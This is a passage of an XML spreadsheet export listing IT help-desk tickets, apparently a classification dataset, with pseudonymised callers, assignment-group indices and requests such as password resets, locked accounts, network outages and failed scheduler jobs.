    <s v="cubslqyt dwzhnmgy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ethics access "/>
    <s v="_x000d__x000a__x000d__x000a_received from: jegpvyrh.kasnhdrb@gmail.com_x000d__x000a__x000d__x000a_team,_x000d__x000a_i would like to complete ethics._x000d__x000a_i ask you to usa access._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="jegpvyrh kasnhdrb"/>
    <x v="23"/>
  </r>
  <r>
    <s v="problem with EU_tool"/>
    <s v="hello altogether_x000d__x000a__x000d__x000a_we have problems with our EU_tool._x000d__x000a_please open zuteillisten&gt;&gt;&gt;plant_110 &gt;&gt;&gt;&gt;hartbearbeitung&gt;&gt;&gt;&gt;&gt;kantenverrunden&gt;&gt;&gt;&gt;sammelarbpl_x000d__x000a__x000d__x000a_then you see this window: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in the past when we do a doubleklick on eps we could see in a new window our point of measurement for this inserts. but now this function is out of service. _x000d__x000a_ _x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="mstnjfai xcobykhl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset request."/>
    <s v="password reset request."/>
    <s v="kcqzrgef awnjdlyr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem with EU_tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: mstnjfai.xcobykhl@gmail.com_x000d__x000a__x000d__x000a_hello altogether_x000d__x000a__x000d__x000a_we have problems with our EU_tool._x000d__x000a_please open zuteillisten&gt;&gt;&gt;plant_110 &gt;&gt;&gt;&gt;hartbearbeitung&gt;&gt;&gt;&gt;&gt;kantenverrunden&gt;&gt;&gt;&gt;sammelarbpl_x000d__x000a__x000d__x000a_then you see this window:_x000d__x000a_[cid:image005.png@01d1f173.087ba8f0]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in the past when we do a doubleklick on eps we could see in a new window our point of measurement for this inserts. but now this function is out of service._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="mstnjfai xcobykhl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="guest wifi access request"/>
    <s v="_x000a__x000a_received from: wchidyuk.shqbfpuy@gmail.com_x000a__x000a_hi,_x000a__x000a_following are the details of guest visiting company india from tomorrow and request you to provigjtyswkb dpvaymxrest wifi access._x000a__x000a_sl.no._x000a__x000a_guest first name_x000a__x000a_guest last name_x000a__x000a_guest email-id_x000a__x000a_location_x000a__x000a_company sponsor email-id_x000a__x000a_access required till (date)_x000a__x000a_1_x000a__x000a_sadiertpta_x000a__x000a_palffs_x000a__x000a_sadiertpta.palffs@partner.com&lt;mailto:sadiertpta.palffs@partner.com&gt;_x000a__x000a_india_x000a__x000a_yhmwxsqj.ugnthxky@gmail.com&lt;mailto:yhmwxsqj.ugnthxky@gmail.com&gt;_x000a__x000a_08/12/2016_x000a__x000a_2_x000a__x000a_rohitdrf_x000a__x000a_stahyru_x000a__x000a_rohitdrf.stahyru8@partner.com&lt;mailto:rohitdrf.stahyru8@partner.com&gt;_x000a__x000a_india_x000a__x000a_yhmwxsqj.ugnthxky@gmail.com&lt;mailto:yhmwxsqj.ugnthxky@gmail.com&gt;_x000a__x000a_09/09/2016_x000a__x000a_3_x000a__x000a_vikrhtyas kurtyar _x000a__x000a_gurpthy_x000a__x000a_vikrhtyaskurtyar .gurpthy@partner.com&lt;mailto:vikrhtyaskurtyar .gurpthy@partner.com&gt;_x000a__x000a_india_x000a__x000a_yhmwxsqj.ugnthxky@gmail.com&lt;mailto:yhmwxsqj.ugnthxky@gmail.com&gt;_x000a__x000a_09/09/2016_x000a__x000a__x000a__x000a_with "/>
    <s v="ythucdjx mujfrsyl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="SID_1 access"/>
    <s v="_x000d__x000a__x000d__x000a_received from: rgtarthi.erjgypa@company.com_x000d__x000a__x000d__x000a_hello help,_x000d__x000a__x000d__x000a_my access to SID_1 seems to be not working._x000d__x000a__x000d__x000a_please enable &amp; confirm. "/>
    <s v="xqoljzbh aydcwkxt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="open order kart issues - distributor_tool"/>
    <s v="in the distributor_tool production system, the oprn carts are not displaying any carrier information._x000d__x000a__x000d__x000a_please check and fix the issue urgently."/>
    <s v="vbmzgsdk jdmyazti"/>
    <x v="21"/>
  </r>
  <r>
    <s v="mii not working"/>
    <s v="mii at usa is estorage_productly slow and errors out"/>
    <s v="omufjcxr ahypftjx"/>
    <x v="40"/>
  </r>
  <r>
    <s v="ethics login issue"/>
    <s v="hello, _x000d__x000a_would you please support?_x000d__x000a_''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s v="uarnkqps gufcjxma"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no boot : 7350  "/>
    <s v="no boot : 7350 "/>
    <s v="iygsxftl hysrbgad"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticketing_tool queries "/>
    <s v="_x000a_summary:ticketing_tool change i have changed the status to closed cancelled instead of closed complete. how to revert the change?"/>
    <s v="abtknpew ifcekjdb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="in the dob report - there is no option to subscribe to the reprot to receive it daily in your mail"/>
    <s v="the dob report_x000d__x000a_#/site/certified_content/views/dailyorderbillingreport/day?:iid=1_x000d__x000a_needs to have a subscribe option _x000d__x000a_i cannot see it on the screen_x000d__x000a_"/>
    <s v="wvdxnkhf jirecvta"/>
    <x v="8"/>
  </r>
  <r>
    <s v="attendance_tool password rest"/>
    <s v="_x000a__x000a_received from: kugwsrjz.xnygwtle@gmail.com_x000a__x000a_please reset my attendance_tool password as i forgot._x000a__x000a_username: 20341722_x000a__x000a_gurhyqsath j_x000a_india met_x000a_kugwsrjz.xnygwtle@gmail.com&lt;mailto:kugwsrjz.xnygwtle@gmail.com&gt;_x000a_"/>
    <s v="isuclrnw hxrtkiws"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reporting_tool application sending multiple emails via smtp : hqap100.company.com"/>
    <s v="hi ramdnty,_x000d__x000a_as discussed, we send emails (also called subscriptions) out of reporting_tool application on a daily basis._x000d__x000a_the smtp server has remained the same for last 2 years. _x000d__x000a_since 29th july, the users are receiving duplicate emails. for example, see attached the duplicate emails i have been receiving daily._x000d__x000a_one more thing to note is that reporting_tool maintains a count of emails sent per day but the count has not doubled indicating that smtp server seems to be processing it twice instead of reporting_tool sending them multiple times._x000d__x000a_smtp server : hqap100.company.com_x000d__x000a_the issue has been escalate to higher management. _x000d__x000a_greatly appreciate if you could look into this as the earliest. let me know if you need more details._x000d__x000a__x000d__x000a_"/>
    <s v="vthuzanc fqdgotvx"/>
    <x v="26"/>
  </r>
  <r>
    <s v="vvdortddp"/>
    <s v="_x000a__x000a_received from: aksthyuhath.shettythruy@company.com_x000a__x000a_hi,_x000a__x000a_below mentioned employee is unable to login ess portal. please reset the password._x000a__x000a_emp no_x000a__x000a_name_x000a__x000a_useid_x000a__x000a_202845583_x000a__x000a_yaxmwdth xsfgitmq_x000a__x000a_vvdortddp_x000a__x000a__x000a_fyi._x000a__x000a_[cid:image001.png@01d1f185.546032b0]_x000a__x000a_with "/>
    <s v="badnzyue nxuqmdwl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="audio not working "/>
    <s v="audio not working _x000d__x000a_computer model-dell precision m4800_x000d__x000a_ name-awyl8912226_x000d__x000a_"/>
    <s v="rcvyfkzo hstgdfyx"/>
    <x v="18"/>
  </r>
  <r>
    <s v="vendor drawing access is not working - no vendor can access data anymore "/>
    <s v="vendor_access isn't working (external website) no vendor can access drawings or model. situation get critical and causes delays in customer orders. all vendors are affected._x000d__x000a_error message : unable to read document information from erp (see attachment)"/>
    <s v="tghrloks jbgcvlmf"/>
    <x v="25"/>
  </r>
  <r>
    <s v="investment antrag mnakehrf mvunqihf - new laptop request - mnakehrf mvunqihf"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jywvemun.qngschtz@gmail.com_x000d__x000a__x000d__x000a_team, anbei ein investmentantrag fÃ¼r einen neuen rechner/laptop fÃ¼r mnakehrf mvunqihf_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="jywvemun qngschtz"/>
    <x v="28"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_3181"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_3181 at 08/08/16 05:01:29"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="stepfhryhan needs access to below collaboration_platform links. "/>
    <s v="stepfhryhan needs access to below collaboration_platform links. _x000a__x000a_urlaubsplanung (file://efdl9221150/users/linnes/collaboration_platform%20-%20company%20inc-/fy16%20teamordner%20linnemann/urlaubsplanung) _x000a_3p plÃ¤ne (file://efdl9221150/users/linnes/collaboration_platform%20-%20company%20inc-/fy16%20teamordner%20linnemann/3p%20pl%e4ne) _x000a__x000a_allgemeines (file://efdl9221150/users/linnes/collaboration_platform%20-%20company%20inc-/fy16%20teamordner%20linnemann/allgemeines) _x000a_berirtchtswesen gebiet nord (file://efdl9221150/users/linnes/collaboration_platform%20-%20company%20inc-/fy16%20teamordner%20linnemann/berirtchtswesen%20gebiet%20nord) _x000a__x000a_crm teamordner (file://efdl9221150/users/linnes/collaboration_platform%20-%20company%20inc-/fy16%20teamordner%20linnemann/crm%20teamordner) _x000a__x000a_teamcall teammeeting (file://efdl9221150/users/linnes/collaboration_platform%20-%20company%20inc-/fy16%20teamordner%20linnemann/teamcall%20teammeeting) _x000a__x000a_top 5 projekte (file://efdl9221150/users/linnes/collaboration_platform%20-%20company%20inc-/fy16%20teamordner%20linnemann/top%205%20projekte) _x000a__x000a__x000a__x000a_hallo sabrthy,_x000a_ _x000a_wie weit sind wir in diesem thema? habe noch kein ticket erhaltenâ€¦_x000a_ _x000a_mit freundlichen grÃ¼ÃŸen_x000a_nizholae bjnqikym_x000a_anwendungstechniker i application engineer_x000a_nizholae.bjnqikym@gmail.com_x000a__x000a_company deutschland gmbh_x000a_ _x000a_ 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_x000a_von: nizholae bjnqikym _x000a_gesendet: donnerstag, 21. juli 2016 12:16_x000a_an: aorthyme rnsuipbk &lt;aorthyme.rnsuipbk@gmail.com&gt;_x000a_betreff: aw: no access to netweaver._x000a_ _x000a_danke sabrthyâ€¦_x000a_ _x000a_mit freundlichen grÃ¼ÃŸen_x000a_nizholae bjnqikym_x000a_anwendungstechniker i application engineer_x000a_nizholae.bjnqikym@gmail.com_x000a_ _x000a_ _x000a__x000a__x000a_diese mitteilung ist einzig und allein fÃ¼r die nutzung durch den adressaten bestimmt und kann informationen enthalten, die schutzwÃ¼rdig, vertraulich oder nach geltendem recht von der offenlegung ausgenommen sind. die verbreitung, verteilung oder vervielfÃ¤ltigung dieser mitteilung durch personen, bei denen es sich nicht um die beabsichtigten empfÃ¤nger handelt, ist streng verboten. wenn diese mitteilung aufgrund eines versehens bei ihnen eingegangen ist, dann benachrichtigen sie bitte den absender und lÃ¶schen sie diese mitteilung. _x000a_        _x000a_select the following link to view the disclaimer in an alternate language. _x000a_ _x000a_von: aorthyme rnsuipbk _x000a_gesendet: donnerstag, 21. juli 2016 12:03_x000a_an: nizholae bjnqikym &lt;nizholae.bjnqikym@gmail.com&gt;_x000a_betreff: re: no access to netweaver._x000a_ _x000a_hallo stepfhryhan,_x000a_ _x000a_das nimmt ein bisschen zeit. ich erfasse ein ticket dazu._x000a_ _x000a_ _x000a_warm "/>
    <s v="nizholae bjnqikym"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to select my course, when i select a language there is an error and unable to go further"/>
    <s v="unable to select my course, when i select a language there is an error and unable to go further"/>
    <s v="lmwfdnri joplxizv"/>
    <x v="23"/>
  </r>
  <r>
    <s v="data backup und restore \ahlqgjwx wbsfavhg"/>
    <s v="data backup und restore \ahlqgjwx wbsfavhg"/>
    <s v="ahlqgjwx wbsfavhg"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \aqstdryv flbnyqzc"/>
    <s v="setup new ws \aqstdryv flbnyqzc"/>
    <s v="aqstdryv flbnyqzc"/>
    <x v="24"/>
  </r>
  <r>
    <s v="cannot log-in to telephony_software"/>
    <s v="hello, _x000d__x000a__x000d__x000a_cannot log in to telephony_software, see error message attached.  in the meantime i tried so many times that my password is surely locked, too. _x000d__x000a__x000d__x000a_"/>
    <s v="ugephfta hrbqkvij"/>
    <x v="6"/>
  </r>
  <r>
    <s v="order: 24761483"/>
    <s v="from: rxoynvgi ntgdsehl _x000a_sent: monday, august 08, 2016 12:16 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: johthryugftyson hu; kaguhxwo uoyipxqg; -kds sw11-services_x000a_subject: rad:fw: order: 35872594_x000a__x000a_hi it team_x000a__x000a_kindly please assist, as we unable to create dn for po 5018078764._x000a_ _x000a__x000a_hydstheud mddwwyleh_x000a_operation supervisor_x000a_company distribution services of asia pte ltd _x000a_( asia regional distribution centre)_x000a_email : rxoynvgi.ntgdsehl@gmail.com_x000a__x000a__x000a_from: johthryugftyson hu _x000a_sent: monday, august 08, 2016 1:14 pm_x000a_to: -kds mmaster; rxoynvgi ntgdsehl_x000a_cc: -kds sw11-services; kaguhxwo uoyipxqg_x000a_subject: re: order: 35872594_x000a__x000a_din,_x000a__x000a_please create ticket to it for help._x000a__x000a_juhu jojfufn_x000a_ap logistics manager_x000a__x000a_from: -kds mmaster _x000a_sent: monday, august 08, 2016 1:11 pm_x000a_to: rxoynvgi ntgdsehl_x000a_cc: -kds sw11-services; johthryugftyson hu; kaguhxwo uoyipxqg_x000a_subject: re: order: 35872594_x000a__x000a_hi zadnryuinudin,_x000a__x000a_rqfhiong zkwfqagb team can only create sto. we are not authorized to create dn. plant_298 warehouse persons can create dn for the sto 5018078764._x000a__x000a_"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="5"/>
  </r>
  <r>
    <s v="probleme mit drucker in lÃ¶we uacyltoe hxgayczeraum\reinhard krÃ¶ger"/>
    <s v="probleme mit drucker in lÃ¶we uacyltoe hxgayczeraum\reinhard krÃ¶ger"/>
    <s v="bejvhsfx dmvsclhp"/>
    <x v="24"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_501"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_501 at 08/08/16 03:24:23"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="outlook is not taking password"/>
    <s v="outlook is not taking password"/>
    <s v="nesmdkpr dcaqoxsy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_489"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_489 at 08/08/16 03:13:29"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="telefon hÃ¶rer am apparat fertigung halle c defekt"/>
    <s v="einlasten bei it-plant germany"/>
    <s v="dtrvxiuq bwuqdtfo"/>
    <x v="32"/>
  </r>
  <r>
    <s v="fw: an ''ethical moment'' from the office of ethics and compliance... link not opening"/>
    <s v="hi_x000d__x000a__x000d__x000a_this link is not opening._x000d__x000a__x000d__x000a_from: .ethics@company.com [mailto:.ethics@company.com] _x000d__x000a_sent: wednesday, august 03, 2016 7:30 pm_x000d__x000a_to: qfwijzbd gmkiatjs_x000d__x000a_subject: an ''ethical moment'' from the office of ethics and compliance_x000d__x000a__x000d__x000a_dear team: _x000d__x000a__x000d__x000a_the office of ethics and compliance provides company employees with periodic ethical moments to remind you of your responsibility in practicing good ethical habits. _x000d__x000a__x000d__x000a_click here to access the current ''ethical moment'' _x000d__x000a__x000d__x000a_sethdyr hdtyr_x000d__x000a_the office of ethics &amp; compliance _x000d__x000a_"/>
    <s v="qfwijzbd gmkiatjs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="now acces to the  internet  - webside allways offline"/>
    <s v="_x000d__x000a__x000d__x000a_received from: blktuiae.jzakfmhw@gmail.com_x000d__x000a__x000d__x000a_fyi_x000d__x000a_now access to the  internet  - webside allways offline_x000d__x000a__x000d__x000a_till this weekend_x000d__x000a__x000d__x000a_i am located in fÃ¼rth _ germany_x000d__x000a__x000d__x000a_"/>
    <s v="blktuiae jzakfmhw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="link to ethics ethical moment does not work."/>
    <s v="i am not able to open the ethical moment link either in the e-mail nor from the collaboration_platform site. i tried both the german and english language button."/>
    <s v="dmqxwkfr olmwqzpu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="upgrade from ms office 2010 64bit to office 2013 32bit"/>
    <s v="for further using of the software cutview it is a need to install / upgrade to an 32 bit office system_x000d__x000a_pls untinstall the current office 2010 64bit version and install the 2013 or 2016 32 bit version"/>
    <s v="pblitjvq yqpjcfgx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="computer network connection lost "/>
    <s v="computer network connection lost "/>
    <s v="pjzhkbus mpcyxvdj"/>
    <x v="31"/>
  </r>
  <r>
    <s v="windows account locked and reset password "/>
    <s v="windows account locked and reset password "/>
    <s v="nfckwprm iykptjna"/>
    <x v="0"/>
  </r>
  <r>
    <s v="system monitor resolution problem"/>
    <s v="not able to set resolution 1920 x 1080"/>
    <s v="utgszjrf pacfvxzk"/>
    <x v="18"/>
  </r>
  <r>
    <s v="windows need to be repair"/>
    <s v="windows need to be repair"/>
    <s v="abiuclvj brziktno"/>
    <x v="31"/>
  </r>
  <r>
    <s v="unable to open net weaver "/>
    <s v="unable to open net weaver "/>
    <s v="qxmujhwg rsgqidxw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_2584"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_2584 at 08/08/16 01:31:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="the calendar on my iphone is not showing any meetings"/>
    <s v="name:srinfhyath_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:kflqpite.gbeoqsnc@gmail.com_x000a_customer number:_x000a_telephone:+91-_x000a_summary:hi, the calendar on my iphone is not showing any meetings"/>
    <s v="kflqpite gbeoqsnc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_1 account locked "/>
    <s v="erp SID_1 account locked "/>
    <s v="qzvireok yzuplcgw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_481"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_481 at 08/08/16 01:26:28"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="reset my password"/>
    <s v="my SID_51 system password has been locked due to too many failed attempts. please unlock my user id: gortyhlia and password. pls find attached error screenshot for your reference."/>
    <s v="jmoqelbc fbzsyjne"/>
    <x v="19"/>
  </r>
  <r>
    <s v="bobj repository issue - pls see the attachment for more details"/>
    <s v="bobj repository issue - pls see the attachment for more details"/>
    <s v="cubdsrml znewqgop"/>
    <x v="13"/>
  </r>
  <r>
    <s v="received 6500071831"/>
    <s v="_x000a__x000a_received from: wqzarvhx.hfsojckw@gmail.com_x000a__x000a_help_x000a__x000a_crm 7611182942 is stuck, pls help to solve, "/>
    <s v="wqzarvhx hfsojckw"/>
    <x v="14"/>
  </r>
  <r>
    <s v="account locked in erp SID_34"/>
    <s v="account locked in erp SID_34"/>
    <s v="efdhrlwv aoxtugzr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account lokced "/>
    <s v="erp SID_34 account lokced "/>
    <s v="dnprzuox fwiospxy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to login to ethics"/>
    <s v="not able to login to ethics"/>
    <s v="juelbpyf ozvgnuwb"/>
    <x v="18"/>
  </r>
  <r>
    <s v="laptop is over heating,  left side usb and audio output plug also not working, system is slow"/>
    <s v="laptop is over heating,  left side usb and audio output plug also not working, system is slow"/>
    <s v="cubdsrml znewqgop"/>
    <x v="18"/>
  </r>
  <r>
    <s v="the terminate action for kgarnzdo vkrqojyt has completed."/>
    <s v="from: noscwdpm akiowsmp [mailto:system@hr_tool.com] _x000d__x000a_sent: monday, august 08, 2016 9:21 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: rad:the terminate action for kgarnzdo vkrqojyt has completed._x000d__x000a__x000d__x000a_hello , _x000d__x000a__x000d__x000a_a termination for kgarnzdo vkrqojyt, 11313060, effective 07/26/2016  has been approved._x000d__x000a__x000d__x000a_click the link to view._x000d__x000a__x000d__x000a_"/>
    <s v="noscwdpm akiowsmp"/>
    <x v="19"/>
  </r>
  <r>
    <s v="can't login to skype ,indicate certificate expired "/>
    <s v="skype for business software can't be used "/>
    <s v="mqbxwpfn uclrqfxa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to engineering tool "/>
    <s v="unable to login to engineering tool "/>
    <s v="uplmtybe pdmwyoil"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erpæ— æ³•è¿›è¡Œé‡‡è´­ï¼ˆè½¬ç»™è´ºæ­£å¹³ï¼‰"/>
    <s v="è¿›è¡Œé‡‡è´­æ—¶æ˜¾ç¤º&quot;æ‰¾ä¸åˆ°å‘˜å·¥1111154833çš„æ•°æ®ï¼Œè¯·é€šçŸ¥ç³»ç»Ÿç®¡ç†å‘˜&quot;"/>
    <s v="kyagjxdh dmtjpbnz"/>
    <x v="30"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="ymepzlno eobardlm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="khyzsgnv aletvocx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows log in password reset"/>
    <s v="from: nkiopevt gufwhdky [mailto:nkiopevt.gufwhdky@gmail.com] _x000d__x000a_sent: monday, august 08, 2016 7:44 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_cc: wgpimkle kijhcwur_eh_x000d__x000a_subject: rad:windows log in password reset_x000d__x000a_importance: high_x000d__x000a__x000d__x000a_hi it team_x000d__x000a__x000d__x000a_i cannot log in to windows._x000d__x000a_please reset windows password reset._x000d__x000a__x000d__x000a_best "/>
    <s v="nkiopevt gufwhdky"/>
    <x v="0"/>
  </r>
  <r>
    <s v="å¯†ç æ›´æ”¹åŽï¼Œoutlookæ— æ³•ç™»é™†"/>
    <s v="å¯†ç æ›´æ”¹åŽï¼Œoutlookæ— æ³•ç™»é™†"/>
    <s v="yamndlrz nzcvdmtr"/>
    <x v="30"/>
  </r>
  <r>
    <s v="please reset my erp password."/>
    <s v="please reset my erp password."/>
    <s v="nkiopevt gufwhdky"/>
    <x v="0"/>
  </r>
  <r>
    <s v="login issue"/>
    <s v="login issue_x000d__x000a_-verified user details.(employee# &amp; manager name)_x000d__x000a_-checked the user name in ad and reset the password._x000d__x000a_-advised the user to login and check._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="ckgwemna cgnziqxj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage : south amerirtca(argentina) site is hard down since 05:04pm et on 08/07."/>
    <s v="what type of outage:  ____x_network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _05:04pm et on 08/07__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_no___    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   __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x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_2114"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_2114 at 08/07/16 17:33:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="network outage: usa site is hard down since 05:04 pm et on 08/07."/>
    <s v="what type of outage:  _x____network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _05:04 pm et on 08/07_____________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? _______    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? _______    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  __yes____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   __no______     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ___________   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ___________    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  _______     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="vbwszcqn nlbqsuyv"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1640"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1640 at 08/07/16 16:57:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: snp_heu_5_regen"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: snp_heu_5_regen at 08/07/16 15:28:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bk_hana_SID_62_erp_wly_dp"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bk_hana_SID_62_erp_wly_dp at 08/07/16 13:24:24"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="lhqsm673 ( kashfyujqti jdcbiezx1 ) disk free on c:\ is now 14%, which is below the warning threshold (15%) "/>
    <s v="lhqsm673 ( kashfyujqti jdcbiezx1 ) disk free on c:\ is now 14%, which is below the warning threshold (15%) out of total size 75.0 gb"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="11"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bwhrattr"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bwhrattr at 08/07/16 09:21:24"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="HostName_1238 ( south_amerirtca, br -plm dsc file - production) wrong number of instances of process dsccache.exe, expected instan"/>
    <s v="HostName_1238 ( south_amerirtca, br -plm dsc file - production) dsccache.exe: wrong number of instances of process dsccache.exe, expected instances gte 1 but found 0"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="13"/>
  </r>
  <r>
    <s v="HostName_1218(usa, va-plm web-file cache - production): dsccache.exe service is down since 1:08am est on 08/07/16"/>
    <s v="HostName_1218(usa, va-plm web-file cache - production): dsccache.exe service is down since 1:08am est on 08/07/16"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="13"/>
  </r>
  <r>
    <s v="HostName_986:(plm conversion-  production) alwaysupservice.exe: wrong number of instances of process alwaysupservice.exe, ex"/>
    <s v="HostName_986:(plm conversion-  production) alwaysupservice.exe: wrong number of instances of process alwaysupservice.exe, expected instances gte 5 but found 4"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="13"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: snp_heu_1_regen"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: snp_heu_1_regen at 08/07/16 06:13:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="5"/>
  </r>
  <r>
    <s v="HostName_1042(bobj-ds-app &amp; web - prod) : al_engine.exe service is down."/>
    <s v="HostName_1042(bobj-ds-app &amp; web - prod) : al_engine.exe service is down (al_engine.exe: wrong number of instances of process al_engine.exe, expected 1 - found 0)"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="13"/>
  </r>
  <r>
    <s v="vip:2 log in proplems vip"/>
    <s v="_x000d__x000a__x000d__x000a_received from: oxrnpuys.oxizkwmq@gmail.com_x000d__x000a__x000d__x000a_dear helpdesk._x000d__x000a_i was on vacation and briefly before i left i changed my password as required._x000d__x000a_now it seems that my main windows log in is still with the old password, while outlook sype etc. is already on the new password._x000d__x000a__x000d__x000a_also, the company main log on is not right._x000d__x000a_i usually log in with my  company.com account, which is not appearing any more._x000d__x000a__x000d__x000a_what needs to be done._x000d__x000a__x000d__x000a_i am not and will not be at a company site ( network ) for another week._x000d__x000a__x000d__x000a_"/>
    <s v="oxrnpuys oxizkwmq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bw jobs are failing because of the server issue"/>
    <s v="bw jobs are failing because of the server issue. could you please check &amp; confirm. please refer the screen shot sent in an email."/>
    <s v="froajhdb ijetmkuc"/>
    <x v="13"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1305"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1305 at 08/07/16 01:24:27"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
